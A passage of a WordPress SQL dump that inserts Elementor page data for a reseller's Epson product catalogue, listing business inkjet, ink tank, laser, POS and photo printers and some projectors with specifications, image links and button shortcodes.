INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (8039,3492,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split 